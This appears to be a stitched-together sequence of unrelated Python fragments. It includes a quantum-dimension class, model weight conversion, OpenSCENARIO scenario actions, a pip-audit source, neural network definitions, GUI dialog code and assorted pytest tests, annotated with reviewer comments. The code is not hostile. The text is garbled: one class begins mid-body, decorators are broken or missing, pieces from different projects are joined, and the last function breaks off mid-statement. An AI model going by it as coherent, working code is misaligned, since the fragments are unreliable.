    # Cache shared across instances; presumably populated by MetaSpace —
    # TODO confirm against the metaclass implementation.
    _stored_dims = {}
    def __init__(self, dims):
        # Accept anything integer-valued; reject non-integers and size <= 0.
        idims = int(dims)
        if ((idims <= 0) or (idims != dims)):
            raise ValueError('Dimensions must be integers > 0')
        self.size = dims
        self.issuper = False
        self.superrep = None
        self._pure_dims = True
        # NOTE(review): assigning a dunder on the *instance* does not change
        # item-assignment behavior (Python looks dunders up on the type);
        # presumably intended to "freeze" the object — confirm.
        self.__setitem__ = _frozen
    def __eq__(self, other):
        return ((self is other) or ((type(other) is type(self)) and (other.size == self.size)))
    def __hash__(self):
        return hash(self.size)
    def __repr__(self):
        return f'Space({self.size})'
    def as_list(self):
        # Flat space renders as a one-element dims list.
        return [self.size]
    def __str__(self):
        return str(self.as_list())
    def dims2idx(self, dims):
        # Identity mapping for a flat space.
        return dims
    def idx2dims(self, idx):
        return [idx]
    def step(self):
        # Stride of the single axis.
        return [1]
    def flat(self):
        return [self.size]
    def remove(self, idx):
        raise RuntimeError('Cannot delete a flat space.')
    def replace(self, idx, new):
        """Return a new flat Space of size *new*; only index 0 is valid."""
        if (idx != 0):
            raise ValueError('Cannot replace a non-zero index in a flat space.')
        return Space(new)
    def replace_superrep(self, super_rep):
        # Flat spaces carry no superoperator representation; no-op.
        return self
def test_fileinrewriterstep_in_and_out_with_formatting():
    """Both in/out paths should have {k1} interpolated from the context."""
    context = Context({'k1': 'v1', 'root': {'in': 'inpath{k1}here', 'out': 'outpath{k1}here'}})
    step = FileInRewriterStep('blah.name', 'root', context)
    assert step.path_in == 'inpathv1here'
    assert step.path_out == 'outpathv1here'
    assert step.context == context
    assert step.logger.name == 'blah.name'
class Response_Aggregator(nn.Module):
    """Two-layer MLP head mapping per-class responses to segmentation logits.

    Input width defaults to ``num_class`` unless ``input_class`` overrides it;
    the hidden path is input -> W -> W//2 -> num_class.
    """

    def __init__(self, num_class, W=256, input_class=None):
        super(Response_Aggregator, self).__init__()
        self.num_class = num_class
        self.W = W
        in_features = num_class if input_class is None else input_class
        self.input_linear = nn.Sequential(fc_block(in_features, W), fc_block(W, W // 2))
        self.output_linear = nn.Linear(W // 2, num_class)

    def forward(self, x):
        hidden = self.input_linear(x)
        return self.output_linear(hidden)
class MathUtilsTestCase(TestCase):
    """number_of_decimal_places must handle ints, floats, strings and negatives."""

    def test_number_of_decimal_places(self):
        cases = [(1, 0), (3.14, 2), ('3.14', 2), (-3.14, 2)]
        for value, expected in cases:
            self.assertEqual(number_of_decimal_places(value), expected)
def recursively_load_weights(fairseq_model, hf_model, is_headless):
    """Copy every tensor from the fairseq state dict into the HF
    Wav2Vec2-Conformer model, translating names via MAPPING; tensors that
    match nothing are collected and logged as unused."""
    unused_weights = []
    fairseq_dict = fairseq_model.state_dict()
    feature_extractor = hf_model.wav2vec2_conformer.feature_extractor
    for (name, value) in fairseq_dict.items():
        is_used = False
        if ('conv_layers' in name):
            # Feature-extractor convolutions have their own loader.
            load_conv_layer(name, value, feature_extractor, unused_weights, (hf_model.config.feat_extract_norm == 'group'))
            is_used = True
        else:
            for (key, mapped_key) in MAPPING.items():
                # Keys outside TOP_LEVEL_KEYS live under the base model prefix.
                mapped_key = (('wav2vec2_conformer.' + mapped_key) if (mapped_key not in TOP_LEVEL_KEYS) else mapped_key)
                if ((key in name) or (key.split('w2v_model.')[(- 1)] == name.split('.')[0])):
                    is_used = True
                    if ('*' in mapped_key):
                        # Substitute the encoder layer index into the template.
                        layer_index = name.split(key)[0].split('.')[(- 2)]
                        mapped_key = mapped_key.replace('*', layer_index)
                    # Classify which attribute of the target module receives
                    # the tensor; None means the whole parameter.
                    if ('pos_bias_u' in name):
                        weight_type = None
                    elif ('pos_bias_v' in name):
                        weight_type = None
                    elif ('weight_g' in name):
                        weight_type = 'weight_g'
                    elif ('weight_v' in name):
                        weight_type = 'weight_v'
                    elif ('bias' in name):
                        weight_type = 'bias'
                    elif ('weight' in name):
                        weight_type = 'weight'
                    elif ('running_mean' in name):
                        weight_type = 'running_mean'
                    elif ('inv_freq' in name):
                        weight_type = 'inv_freq'
                    elif ('running_var' in name):
                        weight_type = 'running_var'
                    elif ('num_batches_tracked' in name):
                        weight_type = 'num_batches_tracked'
                    else:
                        weight_type = None
                    set_recursively(hf_model, mapped_key, value, name, weight_type)
                continue
        if (not is_used):
            unused_weights.append(name)
    logger.warning(f'Unused weights: {unused_weights}')
class LongitudinalDistanceAction(_PrivateActionType):
    """OpenSCENARIO LongitudinalDistanceAction: keep a distance or time gap
    to *entity*, optionally under dynamic constraints.  Exactly one of
    ``distance``/``timeGap`` must be supplied."""
    def __init__(self, entity, freespace=True, continuous=True, max_acceleration=None, max_deceleration=None, max_speed=None, distance=None, timeGap=None, coordinate_system=CoordinateSystem.entity, displacement=LongitudinalDisplacement.any):
        self.target = entity
        self.freespace = convert_bool(freespace)
        self.continuous = convert_bool(continuous)
        self.dynamic_constraint = DynamicsConstraints(max_acceleration, max_deceleration, max_speed)
        # distance and timeGap are mutually exclusive, and one is required.
        if ((distance is not None) and (timeGap is not None)):
            raise ToManyOptionalArguments('Not both of distance and timeGap can be used.')
        if ((distance is None) and (timeGap is None)):
            raise NotEnoughInputArguments('Either ds or dsLane is needed as input.')
        self.distance = convert_float(distance)
        self.timeGap = convert_float(timeGap)
        self.coordinate_system = convert_enum(coordinate_system, CoordinateSystem)
        self.displacement = convert_enum(displacement, LongitudinalDisplacement)
    def __eq__(self, other):
        # NOTE(review): falls through (returning None) when *other* is a
        # different type — presumably should return False/NotImplemented;
        # confirm before changing.
        if isinstance(other, LongitudinalDistanceAction):
            if ((self.get_attributes() == other.get_attributes()) and (self.dynamic_constraint == other.dynamic_constraint)):
                return True
            return False
    # NOTE(review): takes no self — looks like a stripped @staticmethod
    # decorator; confirm against the original file.
    def parse(element):
        """Build a LongitudinalDistanceAction from a <PrivateAction> element."""
        lda_element = element.find('LongitudinalAction/LongitudinalDistanceAction')
        entity = lda_element.attrib['entityRef']
        freespace = convert_bool(lda_element.attrib['freespace'])
        continuous = convert_bool(lda_element.attrib['continuous'])
        distance = None
        timeGap = None
        if ('distance' in lda_element.attrib):
            distance = convert_float(lda_element.attrib['distance'])
        if ('timeGap' in lda_element.attrib):
            timeGap = convert_float(lda_element.attrib['timeGap'])
        # Optional attributes fall back to the schema defaults.
        coordinate_system = CoordinateSystem.entity
        if ('coordinateSystem' in lda_element.attrib):
            coordinate_system = convert_enum(lda_element.attrib['coordinateSystem'], CoordinateSystem, False)
        displacement = LongitudinalDisplacement.any
        if ('displacement' in lda_element.attrib):
            displacement = convert_enum(lda_element.attrib['displacement'], LongitudinalDisplacement, False)
        max_acceleration = None
        max_deceleration = None
        max_speed = None
        constraints = None
        if (lda_element.find('DynamicConstraints') != None):
            constraints = DynamicsConstraints.parse(lda_element.find('DynamicConstraints'))
            max_acceleration = constraints.max_acceleration
            max_deceleration = constraints.max_deceleration
            max_speed = constraints.max_speed
        return LongitudinalDistanceAction(entity, freespace, continuous, max_acceleration, max_deceleration, max_speed, distance, timeGap, coordinate_system, displacement)
    def get_attributes(self):
        """Return the XML attribute dict for this action."""
        retdict = {}
        retdict['entityRef'] = self.target
        retdict['freespace'] = get_bool_string(self.freespace)
        retdict['continuous'] = get_bool_string(self.continuous)
        if (self.distance != None):
            retdict['distance'] = str(self.distance)
        if (self.timeGap != None):
            retdict['timeGap'] = str(self.timeGap)
        # coordinateSystem/displacement only exist from OpenSCENARIO V1.1 on.
        if (not self.isVersion(minor=0)):
            retdict['coordinateSystem'] = self.coordinate_system.get_name()
            retdict['displacement'] = self.displacement.get_name()
        return retdict
    def get_element(self):
        """Return the <PrivateAction> ElementTree element for this action."""
        element = ET.Element('PrivateAction')
        longact = ET.SubElement(element, 'LongitudinalAction')
        longdistaction = ET.SubElement(longact, 'LongitudinalDistanceAction', attrib=self.get_attributes())
        if self.dynamic_constraint.is_filled():
            longdistaction.append(self.dynamic_constraint.get_element())
        return element
class InstagramOAuth2Test(OAuth2Test):
    """Login and partial-pipeline tests for the Instagram OAuth2 backend."""
    backend_path = 'social_core.backends.instagram.InstagramOAuth2'
    # FIX: this literal was truncated in the source (unterminated string,
    # a syntax error).  Restored to the legacy self-profile endpoint that
    # matches the 'meta'/'user' response bodies below — verify against the
    # backend's USER_DATA_URL.
    user_data_url = 'https://api.instagram.com/v1/users/self'
    expected_username = 'foobar'
    access_token_body = json.dumps({'access_token': 'foobar', 'token_type': 'bearer', 'meta': {'code': 200}, 'user': {'username': 'foobar', 'id': ''}})
    user_data_body = json.dumps({'meta': {'code': 200}, 'username': 'foobar', 'id': ''})

    def test_login(self):
        self.do_login()

    def test_partial_pipeline(self):
        self.do_partial_pipeline()
def test_IterativeImputer_params_vs_sklearn():
    """skcriteria's IterativeImputer must expose sklearn's parameters
    (modulo the ignored ones and the features->criteria aliases)."""
    from sklearn.experimental import enable_iterative_imputer
    ignore = ['add_indicator', 'skip_complete']
    alias = {'n_nearest_features': 'n_nearest_criteria', 'keep_empty_features': 'keep_empty_criteria'}
    sk_params = sklimpute.IterativeImputer().get_params(deep=False)
    expected = sorted(alias.get(name, name) for name in sk_params if name not in ignore)
    result = sorted(impute.IterativeImputer._skcriteria_parameters)
    assert result == expected
# NOTE(review): these three lines look like '@pytest.mark.parametrize(...)'
# decorators whose '@pytest.mark' prefix was lost in extraction — confirm
# against the original file.
.parametrize('order', [20, 25, 30])
.parametrize('alpha', [0.0, 0.35, 0.5])
.parametrize('stage', [1, 2, 3, 4, 5, 6])
def test_mglsadf(order, alpha, stage):
    """Run both mglsadf variants through the shared filter test harness."""
    delay = pysptk.mglsadf_delay(order, stage)
    __test_filt_base(pysptk.mglsadf, order, delay, alpha, stage)
    __test_filt_base(pysptk.mglsadft, order, delay, alpha, stage)
def get_tiny_config(config_class, model_class=None, **model_tester_kwargs):
    """Build a tiny model config by locating the model's test module,
    instantiating its (alphabetically first) model-tester class, and asking
    it for a config.

    Raises ValueError when the testing module or a usable tester cannot be
    found, or when the tester exposes no config-producing method.
    """
    model_type = config_class.model_type
    # Derive 'xxx' from 'configuration_xxx.py' to find 'test_modeling_xxx.py'.
    config_source_file = inspect.getsourcefile(config_class)
    modeling_name = config_source_file.split(os.path.sep)[(- 1)].replace('configuration_', '').replace('.py', '')
    try:
        print('Importing', model_type_to_module_name(model_type))
        module_name = model_type_to_module_name(model_type)
        if (not modeling_name.startswith(module_name)):
            raise ValueError(f"{modeling_name} doesn't start with {module_name}!")
        test_file = os.path.join('tests', 'models', module_name, f'test_modeling_{modeling_name}.py')
        models_to_model_testers = get_model_to_tester_mapping(test_file)
        model_tester_class = None
        tester_classes = []
        if (model_class is not None):
            tester_classes = get_tester_classes_for_model(test_file, model_class)
        else:
            for _tester_classes in models_to_model_testers.values():
                tester_classes.extend(_tester_classes)
        if (len(tester_classes) > 0):
            # Deterministic pick: first tester class by name.
            model_tester_class = sorted(tester_classes, key=(lambda x: x.__name__))[0]
    except ModuleNotFoundError:
        error = f'Tiny config not created for {model_type} - cannot find the testing module from the model name.'
        raise ValueError(error)
    if (model_tester_class is None):
        error = f'Tiny config not created for {model_type} - no model tester is found in the testing module.'
        raise ValueError(error)
    model_tester = model_tester_class(parent=None, **model_tester_kwargs)
    # Prefer the pipeline config, then the prepared config, then get_config().
    if hasattr(model_tester, 'get_pipeline_config'):
        return model_tester.get_pipeline_config()
    elif hasattr(model_tester, 'prepare_config_and_inputs'):
        return model_tester.prepare_config_and_inputs()[0]
    elif hasattr(model_tester, 'get_config'):
        return model_tester.get_config()
    else:
        error = f'Tiny config not created for {model_type} - the model tester {model_tester_class.__name__} lacks necessary method to create config.'
        raise ValueError(error)
class Division(BinaryOperator):
    """Symbolic division node: left / right."""
    def __init__(self, left, right):
        super().__init__('/', left, right)
    def _diff(self, variable):
        """Quotient rule: (top' * bottom - top * bottom') / bottom**2."""
        (top, bottom) = self.orphans
        return (((top.diff(variable) * bottom) - (top * bottom.diff(variable))) / (bottom ** 2))
    def _binary_jac(self, left_jac, right_jac):
        """Jacobian of left/right; shortcut when the numerator is constant."""
        (left, right) = self.orphans
        if left.evaluates_to_constant_number():
            # d(c/r) = -c/r**2 * dr
            return (((- left) / (right ** 2)) * right_jac)
        else:
            # Full quotient rule on the jacobians.
            return (((right * left_jac) - (left * right_jac)) / (right ** 2))
    def _binary_evaluate(self, left, right):
        # Sparse numerators need elementwise multiply by the reciprocal to
        # stay sparse; dense values divide directly.
        if issparse(left):
            return csr_matrix(left.multiply((1 / right)))
        else:
            return (left / right)
def compile_forward_sampling_function(outputs: List[Variable], vars_in_trace: List[Variable], basic_rvs: Optional[List[Variable]]=None, givens_dict: Optional[Dict[(Variable, Any)]]=None, constant_data: Optional[Dict[(str, np.ndarray)]]=None, constant_coords: Optional[Set[str]]=None, **kwargs) -> Tuple[(Callable[(..., Union[(np.ndarray, List[np.ndarray])])], Set[Variable])]:
    """Compile a function for forward sampling of *outputs* and return it
    together with the set of "volatile" basic RVs (those that must be
    resampled rather than read from the trace).

    A node is volatile if it is an output, appears in *givens_dict*, is a
    shared variable whose current value no longer matches *constant_data* /
    *constant_coords*, is a basic RV absent from the trace, or depends on
    any volatile node.
    """
    if (givens_dict is None):
        givens_dict = {}
    if (basic_rvs is None):
        basic_rvs = []
    if (constant_data is None):
        constant_data = {}
    if (constant_coords is None):
        constant_coords = set()
    def shared_value_matches(var):
        # True when the shared variable still holds the value recorded at
        # trace time (by data name, or by membership in constant coords).
        try:
            old_array_value = constant_data[var.name]
        except KeyError:
            return (var.name in constant_coords)
        current_shared_value = var.get_value(borrow=True)
        return np.array_equal(old_array_value, current_shared_value)
    fg = FunctionGraph(outputs=outputs, clone=False)
    # Topological order guarantees parents are classified before children,
    # so volatility can propagate through owner inputs in one pass.
    nodes: List[Variable] = general_toposort(fg.outputs, deps=(lambda x: (x.owner.inputs if x.owner else [])))
    volatile_nodes: Set[Any] = set()
    for node in nodes:
        if ((node in fg.outputs) or (node in givens_dict) or (isinstance(node, SharedVariable) and (not isinstance(node, (RandomStateSharedVariable, RandomGeneratorSharedVariable))) and (not shared_value_matches(node))) or ((node in basic_rvs) and (node not in vars_in_trace)) or (node.owner and any(((inp in volatile_nodes) for inp in node.owner.inputs)))):
            volatile_nodes.add(node)
    # Collect function inputs: root variables and non-volatile trace values.
    inputs = []
    def expand(node):
        if ((((node.owner is None) and (not isinstance(node, (Constant, SharedVariable)))) or (node in vars_in_trace)) and (node not in volatile_nodes)):
            inputs.append(node)
        if node.owner:
            return node.owner.inputs
    list(walk(fg.outputs, expand))
    # Wrap raw given values as constants so they can be substituted.
    givens = [(node, (value if isinstance(value, (Variable, Apply)) else pt.constant(value, dtype=getattr(node, 'dtype', None), name=node.name))) for (node, value) in givens_dict.items()]
    return (compile_pymc(inputs, fg.outputs, givens=givens, on_unused_input='ignore', **kwargs), (set(basic_rvs) & (volatile_nodes - set(givens_dict))))
class PipSource(DependencySource):
    """Dependency source that lists the installed distributions via pip-api
    and can upgrade a vulnerable dependency in place."""

    def __init__(self, *, local: bool=False, paths: Sequence[Path]=(), skip_editable: bool=False, state: AuditState=AuditState()) -> None:
        """Create a PipSource.

        local: restrict to the local (non-global) environment.
        paths: extra search paths for distributions.  FIX: the default was a
            mutable ``[]`` (shared across calls); an empty tuple is the safe
            read-only equivalent.
        skip_editable: skip distributions installed as editable.
        state: progress reporter.  NOTE(review): the ``AuditState()`` default
            is evaluated once at class-definition time and shared by all
            instances that do not pass their own — confirm this is intended.
        """
        self._local = local
        self._paths = paths
        self._skip_editable = skip_editable
        self.state = state
        # Warn when pip would audit an interpreter other than the active venv.
        effective_python = os.environ.get('PIPAPI_PYTHON_LOCATION', sys.executable)
        venv_prefix = os.getenv('VIRTUAL_ENV')
        if ((venv_prefix is not None) and (not effective_python.startswith(venv_prefix))):
            logger.warning(f"pip-audit will run pip against {effective_python}, but you have a virtual environment loaded at {venv_prefix}. This may result in unintuitive audits, since your local environment will not be audited. You can forcefully override this behavior by setting PIPAPI_PYTHON_LOCATION to the location of your virtual environment's Python interpreter.")
        if (_PIP_VERSION < _MINIMUM_RELIABLE_PIP_VERSION):
            logger.warning(f'pip {_PIP_VERSION} is very old, and may not provide reliable dependency information! You are STRONGLY encouraged to upgrade to a newer version of pip.')

    def collect(self) -> Iterator[Dependency]:
        """Yield one Dependency per installed distribution.

        Editable installs (when skip_editable) and invalid versions are
        yielded as SkippedDependency; any pip-api failure is wrapped in
        PipSourceError.
        """
        try:
            for (_, dist) in pip_api.installed_distributions(local=self._local, paths=list(self._paths)).items():
                dep: Dependency
                if (dist.editable and self._skip_editable):
                    dep = SkippedDependency(name=dist.name, skip_reason='distribution marked as editable')
                else:
                    try:
                        dep = ResolvedDependency(name=dist.name, version=Version(str(dist.version)))
                        self.state.update_state(f'Collecting {dep.name} ({dep.version})')
                    except InvalidVersion:
                        skip_reason = f'Package has invalid version and could not be audited: {dist.name} ({dist.version})'
                        logger.debug(skip_reason)
                        dep = SkippedDependency(name=dist.name, skip_reason=skip_reason)
                (yield dep)
        except Exception as e:
            raise PipSourceError('failed to list installed distributions') from e

    def fix(self, fix_version: ResolvedFixVersion) -> None:
        """Upgrade the vulnerable dependency to *fix_version* via `pip install`.

        Raises PipFixError when the subprocess fails.
        """
        self.state.update_state(f'Fixing {fix_version.dep.name} ({fix_version.dep.version} => {fix_version.version})')
        fix_cmd = [sys.executable, '-m', 'pip', 'install', f'{fix_version.dep.canonical_name}=={fix_version.version}']
        try:
            # List-form argv, shell=False by default: no shell injection risk.
            subprocess.run(fix_cmd, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        except subprocess.CalledProcessError as cpe:
            raise PipFixError(f'failed to upgrade dependency {fix_version.dep.name} to fix version {fix_version.version}') from cpe
class IE9(Library):
    """Static JS shim library whose footer output is wrapped in an
    IE<=9 conditional comment so modern browsers ignore it."""

    def __init__(self):
        super().__init__('IE9')
        self.shipped_in_package = 'reahl.web.static'
        self.files = ['IE9.js']

    def footer_only_material(self, rendered_page):
        inner = super().footer_only_material(rendered_page)
        return '\n<!--[if lte IE 9]>' + inner + '<![endif]-->'
class TestIOPath(unittest.TestCase):
    """Training reproducibility must hold when iopath is missing or when the
    path manager cannot rename files."""

    def test_no_iopath(self):
        from .test_reproducibility import TestReproducibility
        # Hide iopath so fairseq falls back to plain file I/O.
        with mock.patch.dict('sys.modules', {'iopath': None}):
            TestReproducibility._test_reproducibility(self, 'test_reproducibility')

    def test_no_supports_rename(self):
        from .test_reproducibility import TestReproducibility
        # Force the non-rename checkpoint path.
        with mock.patch('fairseq.file_io.PathManager.supports_rename') as supports_rename:
            supports_rename.return_value = False
            TestReproducibility._test_reproducibility(self, 'test_reproducibility')
class ResNetV1(HybridBlock):
    """ResNet-V1 backbone with a main classifier (fc2) plus eight auxiliary
    5-way heads (fc3..fc10) used for incremental learning.

    kwargs must contain 'fw' (bool): when True, heads learned in earlier
    increments are evaluated under autograd.pause() so only the newest head
    receives gradients.
    """

    def __init__(self, block, layers, channels, classes=1000, thumbnail=False, last_gamma=False, norm_layer=BatchNorm, norm_kwargs=None, **kwargs):
        super(ResNetV1, self).__init__()
        assert ('fw' in kwargs.keys()), 'no_fw'
        self.fw = kwargs['fw']
        assert (len(layers) == (len(channels) - 1))
        with self.name_scope():
            self.features = nn.HybridSequential(prefix='')
            if thumbnail:
                # Small-input variant: single 3x3 stem, no downsampling.
                self.features.add(_conv3x3(channels[0], 1, 0))
            else:
                self.features.add(nn.Conv2D(channels[0], 7, 2, 3, use_bias=False))
                self.features.add(norm_layer(**({} if (norm_kwargs is None) else norm_kwargs)))
                self.features.add(nn.Activation('relu'))
                self.features.add(nn.MaxPool2D(3, 2, 1))
            for (i, num_layer) in enumerate(layers):
                stride = (1 if (i == 0) else 2)
                self.features.add(self._make_layer(block, num_layer, channels[(i + 1)], stride, (i + 1), in_channels=channels[i], last_gamma=last_gamma, norm_layer=norm_layer, norm_kwargs=norm_kwargs))
            self.features.add(nn.GlobalAvgPool2D())
            # Main head plus eight incremental 5-way heads.
            self.fc2 = nn.Dense(classes, in_units=channels[(- 1)], use_bias=False)
            self.fc3 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
            self.fc4 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
            self.fc5 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
            self.fc6 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
            self.fc7 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
            self.fc8 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
            self.fc9 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
            self.fc10 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)

    def _make_layer(self, block, layers, channels, stride, stage_index, in_channels=0, last_gamma=False, norm_layer=BatchNorm, norm_kwargs=None):
        """Build one residual stage: a (possibly) strided block followed by
        `layers - 1` stride-1 blocks."""
        layer = nn.HybridSequential(prefix=('stage%d_' % stage_index))
        with layer.name_scope():
            layer.add(block(channels, stride, (channels != in_channels), in_channels=in_channels, last_gamma=last_gamma, prefix='', norm_layer=norm_layer, norm_kwargs=norm_kwargs))
            for _ in range((layers - 1)):
                layer.add(block(channels, 1, False, in_channels=channels, last_gamma=last_gamma, prefix='', norm_layer=norm_layer, norm_kwargs=norm_kwargs))
        return layer

    def _head(self, i):
        """Return head fc{i+2}.  FIX: replaces the original
        eval('self.fc' + str(i + 2)) — getattr does the same lookup without
        executing a constructed string."""
        return getattr(self, 'fc' + str(i + 2))

    def hybrid_forward(self, F, x, num=0, fix_cnn=False):
        """Return (L2-normalized pooled feature, logits of heads fc2..fc{num+2}
        concatenated along dim 1).  fix_cnn freezes the backbone."""
        if fix_cnn:
            with ag.pause():
                x = self.features[:7](x)
                x = self.features[7][0](x)
                x = self.features[7][1](x)
                x = self.features[8:](x)
            out = F.L2Normalization(x)
            feat = out
        else:
            x = self.features(x)
            out = F.L2Normalization(x)
            feat = out
        if self.fw:
            for i in range((num + 1)):
                fc = self._head(i)
                if (i < num):
                    # Earlier heads are frozen: no gradients recorded.
                    with ag.pause():
                        output = fc(out) if (i == 0) else mx.nd.concat(output, fc(out), dim=1)
                else:
                    output = fc(out) if (i == 0) else mx.nd.concat(output, fc(out), dim=1)
            return (feat, output)
        else:
            for i in range((num + 1)):
                fc = self._head(i)
                output = fc(out) if (i == 0) else mx.nd.concat(output, fc(out), dim=1)
            return (feat, output)
class SFT_Net(nn.Module):
    """SFT super-resolution network: 16 SFT residual blocks plus a final SFT
    layer/conv, followed by a 4x pixel-shuffle HR branch; conditions are
    produced from 8-channel segmentation maps by CondNet."""

    def __init__(self):
        super(SFT_Net, self).__init__()
        self.conv0 = nn.Conv2d(3, 64, 3, 1, 1)
        branch = [ResBlock_SFT() for _ in range(16)]
        branch.append(SFTLayer())
        branch.append(nn.Conv2d(64, 64, 3, 1, 1))
        self.sft_branch = nn.Sequential(*branch)
        self.HR_branch = nn.Sequential(
            nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(2), nn.ReLU(True),
            nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(2), nn.ReLU(True),
            nn.Conv2d(64, 64, 3, 1, 1), nn.ReLU(True),
            nn.Conv2d(64, 3, 3, 1, 1))
        self.CondNet = nn.Sequential(
            nn.Conv2d(8, 128, 4, 4), nn.LeakyReLU(0.1, True),
            nn.Conv2d(128, 128, 1), nn.LeakyReLU(0.1, True),
            nn.Conv2d(128, 128, 1), nn.LeakyReLU(0.1, True),
            nn.Conv2d(128, 128, 1), nn.LeakyReLU(0.1, True),
            nn.Conv2d(128, 32, 1))

    def forward(self, x):
        # x = (image, segmentation condition maps)
        condition = self.CondNet(x[1])
        features = self.conv0(x[0])
        features = features + self.sft_branch((features, condition))
        return self.HR_branch(features)
def format_func(fn: FuncIR, errors: Sequence[tuple[(ErrorSource, str)]]=()) -> list[str]:
    """Render a FuncIR as pseudocode lines: header, indented registers, then
    the formatted basic blocks (with any errors attached to their sources)."""
    prefix = (fn.class_name + '.') if fn.class_name else ''
    arg_list = ', '.join(arg.name for arg in fn.args)
    lines = ['def {}{}({}):'.format(prefix, fn.name, arg_list)]
    names = generate_names_for_ir(fn.arg_regs, fn.blocks)
    lines.extend('    ' + reg_line for reg_line in format_registers(fn, names))
    source_to_error = defaultdict(list)
    for source, error in errors:
        source_to_error[source].append(error)
    lines.extend(format_blocks(fn.blocks, names, source_to_error))
    return lines
class AM2RGameExportDialog(GameExportDialog, Ui_AM2RGameExportDialog):
    """Export dialog for AM2R: pick an input game directory and an output
    directory, validated live against the accept button."""
    # NOTE(review): takes cls — looks like a stripped @classmethod decorator;
    # confirm against the original file.
    def game_enum(cls):
        return RandovaniaGame.AM2R
    def __init__(self, options: Options, patch_data: dict, word_hash: str, spoiler: bool, games: list[RandovaniaGame]):
        super().__init__(options, patch_data, word_hash, spoiler, games)
        per_game = options.options_for_game(self.game_enum())
        assert isinstance(per_game, AM2RPerGameOptions)
        self.input_file_button.clicked.connect(self._on_input_file_button)
        self.output_file_button.clicked.connect(self._on_output_file_button)
        # Pre-fill remembered paths from the per-game options.
        if (per_game.input_path is not None):
            self.input_file_edit.setText(str(per_game.input_path))
        if (per_game.output_path is not None):
            self.output_file_edit.setText(str(per_game.output_path))
        # NOTE(review): the lambdas appear to return True on *invalid* input
        # (not (...)) — confirm add_field_validation expects an "is invalid"
        # predicate before changing anything here.
        add_field_validation(accept_button=self.accept_button, fields={self.input_file_edit: (lambda : (not (self.input_file.is_dir() and _is_valid_input_dir(self.input_file)))), self.output_file_edit: (lambda : (not (self.output_file.is_dir() and (self.output_file != self.input_file))))})
    # NOTE(review): no self-use beyond attribute reads and called without
    # parentheses above — looks like a stripped @property; confirm.
    def input_file(self) -> Path:
        return Path(self.input_file_edit.text())
    # NOTE(review): likely a stripped @property as well; confirm.
    def output_file(self) -> Path:
        return Path(self.output_file_edit.text())
    def auto_save_spoiler(self) -> bool:
        return self.auto_save_spoiler_check.isChecked()
    def _on_input_file_button(self):
        input_dir = prompt_for_input_directory(self, self.input_file_edit)
        if (input_dir is not None):
            self.input_file_edit.setText(str(input_dir.absolute()))
    def _on_output_file_button(self):
        output_dir = prompt_for_output_directory(self, 'AM2R Randomizer', self.output_file_edit)
        if (output_dir is not None):
            self.output_file_edit.setText(str(output_dir))
    def update_per_game_options(self, per_game: AM2RPerGameOptions) -> AM2RPerGameOptions:
        """Persist the currently chosen paths into the per-game options."""
        return dataclasses.replace(per_game, input_path=self.input_file, output_path=self.output_file)
    def get_game_export_params(self) -> AM2RGameExportParams:
        """Bundle the dialog's selections into export parameters."""
        spoiler_output = spoiler_path_for_directory(self.auto_save_spoiler, self.output_file)
        return AM2RGameExportParams(spoiler_output=spoiler_output, input_path=self.input_file, output_path=self.output_file)
def setUpModule():
    """Build a 1-D H-F chain cell and converge a density-fitted KRHF,
    exposing cell/kmf/kpts/nkpts as module-level fixtures."""
    global cell, kmf, kpts, nkpts
    cell = gto.Cell()
    cell.atom = '\n H 0.0 0.0 0.0\n F 0.9 0.0 0.0\n '
    cell.basis = 'sto-3g'
    cell.a = [[2.82, 0, 0], [0, 2.82, 0], [0, 0, 2.82]]
    cell.dimension = 1
    cell.output = '/dev/null'
    cell.build()
    kpts = cell.make_kpts([2, 1, 1])
    nkpts = len(kpts)
    kmf = scf.KRHF(cell, kpts=kpts, exxdiv=None).density_fit()
    kmf.kernel()
def maybe_create_ambiguous_expander(tree_class, expansion, keep_all_tokens):
    """Return an AmbiguousExpander factory bound to the indices that need
    expansion, or None when no symbol qualifies."""
    to_expand = []
    for index, symbol in enumerate(expansion):
        if keep_all_tokens or (not (symbol.is_term and symbol.filter_out) and _should_expand(symbol)):
            to_expand.append(index)
    if to_expand:
        return partial(AmbiguousExpander, to_expand, tree_class)
def test_arrange_horizontal_with_gap(view, settings):
    """Two 100x80 items arranged with gap=6 end up side by side, centered
    around the selection's midpoint."""
    settings.setValue('Items/arrange_gap', 6)
    item1 = BeePixmapItem(QtGui.QImage())
    view.scene.addItem(item1)
    item1.setSelected(True)
    item1.setPos(10, -100)
    item2 = BeePixmapItem(QtGui.QImage())
    view.scene.addItem(item2)
    item2.setSelected(True)
    item2.setPos(-10, 40)
    view.scene.cancel_crop_mode = MagicMock()
    rect = QtCore.QRectF(0, 0, 100, 80)
    with patch.object(item1, 'bounding_rect_unselected', return_value=rect):
        with patch.object(item2, 'bounding_rect_unselected', return_value=rect):
            view.scene.arrange()
            assert item2.pos() == QtCore.QPointF(-50, -30)
            assert item1.pos() == QtCore.QPointF(56, -30)
            view.scene.cancel_crop_mode.assert_called_once_with()
class MyDataset(torch.utils.data.Dataset):
    """Synthetic dataset yielding 100 random 3x100x100 float tensors."""

    def __init__(self):
        super().__init__()
        self.length = 100

    def __getitem__(self, idx):
        # Reject out-of-range indices explicitly (no negative indexing).
        assert 0 <= idx < self.length, 'Provided index {} must be in range [0, {}).'.format(idx, self.length)
        return torch.rand(3, 100, 100)

    def __len__(self):
        return self.length
def set(name, data=None, dbHandle=None):
    """Create or refresh a marker row, stamping it with the current time.

    If a marker named *name* exists, its last_date is updated (and its extra
    column too when *data* is given); otherwise a new row is inserted with
    extra = data or ''.  NOTE: intentionally shadows the builtin ``set``
    within this module.
    """
    if dbHandle is None:
        dbHandle = ops.db.Database(db=ops.db.TARGET_DB, isolation_level=None)
    with dbHandle as db:
        curs = ensureMarkerTable(db)
        curs.execute('SELECT name, last_date, extra FROM marker WHERE name = :name', (name,))
        if curs.fetchone():
            curs.execute('UPDATE marker SET last_date = :date WHERE name = :name', (datetime.datetime.now(), name))
            if data is not None:
